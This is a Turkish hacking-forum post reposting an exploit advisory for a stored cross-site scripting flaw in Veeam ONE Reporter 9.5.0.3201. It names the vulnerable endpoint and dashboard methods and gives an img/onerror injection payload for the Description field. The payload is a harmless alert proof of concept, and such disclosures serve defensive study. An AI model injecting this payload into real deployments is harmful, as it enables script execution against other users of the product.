Hoşgeldin Misafir

Veeam ONE Reporter 9.5.0.3201 - Persistent Cross-Site Scripting Vulnerability

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Kod:
# Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Stored XSS)
# Exploit Author: Seyed Sadegh Khatami
# Website: https://www.cert.ir
# Vendor Homepage: https://www.veeam.com/
# Software Link: https://www.veeam.com/virtual-server-management-one-free.html
# Version: 9.5.0.3201
# Tested on: Windows Server 2016
 
 
#exploit:
 
Path: /CommonDataHandlerReadOnly.ashx 
 
method: addDashboard / editDashboard
 
SET Description(config) field to “AAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
 
#  0day.today [2019-05-02]  #